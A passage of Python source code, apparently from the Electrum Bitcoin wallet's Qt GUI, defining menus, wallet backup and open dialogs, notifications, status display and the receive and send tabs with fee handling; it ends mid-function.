cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(self, version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), "<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>", _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue total_amount += v self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(v))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def timer_actions(self): # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): # fee_rate is in sat/kB return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte' def get_decimal_point(self): return self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_completions() def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_history', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_address_e = ButtonsLineEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.') self.receive_address_label = HelpLabel(_('Receiving address'), msg) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) grid.addWidget(self.receive_address_label, 0, 0) grid.addWidget(self.receive_address_e, 0, 1, 1, -1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 1, 0) grid.addWidget(self.receive_message_e, 1, 1, 1, -1) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 2, 0) grid.addWidget(self.receive_amount_e, 2, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() self.expires_combo.addItems([i[0] for i in expiration_values]) self.expires_combo.setCurrentIndex(3) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0) grid.addWidget(self.expires_combo, 3, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 3, 1) self.save_request_button = QPushButton(_('Save')) self.save_request_button.clicked.connect(self.save_payment_request) self.new_request_button = QPushButton(_('New')) self.new_request_button.clicked.connect(self.new_payment_request) self.receive_qr = QRCodeWidget(fixedSize=200) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_request_button) buttons.addWidget(self.new_request_button) grid.addLayout(buttons, 4, 1, 1, 2) self.receive_requests_label = QLabel(_('Requests')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addWidget(self.receive_qr) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_payment_request(self, addr): self.wallet.remove_payment_request(addr, self.config) self.request_list.update() self.clear_receive_tab() def get_request_URI(self, addr): req = self.wallet.receive_requests[addr] message = self.wallet.labels.get(addr, '') amount = req['amount'] extra_query_params = {} if req.get('time'): extra_query_params['time'] = str(int(req.get('time'))) if req.get('exp'): extra_query_params['exp'] = str(int(req.get('exp'))) if req.get('name') and req.get('sig'): sig = bfh(req.get('sig')) sig = bitcoin.base_encode(sig, base=58) extra_query_params['name'] = req['name'] extra_query_params['sig'] = sig uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params) return str(uri) def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(str(e)) return else: return def save_payment_request(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() if not message and not amount: self.show_error(_('No message or amount')) return False i = self.expires_combo.currentIndex() expiration = list(map(lambda x: x[1], expiration_values))[i] req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req, self.config) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + str(e)) else: self.sign_payment_request(addr) self.save_request_button.setEnabled(False) finally: self.request_list.update() self.address_list.update() def view_and_paste(self, title, msg, data): dialog = WindowModalDialog(self, title) vbox = QVBoxLayout() label = QLabel(msg) label.setWordWrap(True) vbox.addWidget(label) pr_e = ShowQRTextEdit(text=data) vbox.addWidget(pr_e) vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog))) dialog.setLayout(vbox) dialog.exec_() def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def new_payment_request(self): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) self.set_receive_address(addr) self.expires_label.hide() self.expires_combo.show() self.new_request_button.setEnabled(False) self.receive_message_e.setFocus(1) def set_receive_address(self, addr): self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) def clear_receive_tab(self): try: addr = self.wallet.get_receiving_address() or '' except InternalAddressCorruption as e: self.show_error(str(e)) addr = '' self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) self.new_request_button.setEnabled(True) def update_receive_qr(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() self.save_request_button.setEnabled((amount is not None) or (message != "")) uri = util.create_bip21_uri(addr, amount, message) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} satoshis are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 3, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 3, 1, 1, -1) self.set_pay_from([]) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 4, 0) grid.addWidget(self.amount_e, 4, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 4, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(140) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 4, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 4, 4) msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(140) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(140) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_byte()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 satoshis might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.') + '\n' + _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(20) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) vbox_feecontrol = QVBoxLayout() vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addLayout(vbox_feecontrol, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_send) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = ColorScheme.RED, ColorScheme.RED feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} {})".format( self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen") ) # blue color denotes auto-filled values elif self.fee_e.isModified(): feerate_color = ColorScheme.BLUE elif self.feerate_e.isModified(): fee_color = ColorScheme.BLUE elif self.amount_e.isModified(): fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE else: amt_color = ColorScheme.BLUE fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.feerate_e.setStyleSheet(feerate_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.feerate_e.textChanged.connect(entry_changed) self.invoices_label = QLabel(_('Invoices')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return self.max_button.setChecked(True) self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' freeze_fee = self.is_send_fee_frozen() freeze_feerate = self.is_send_feerate_frozen() amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_est, is_sweep=is_sweep) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, 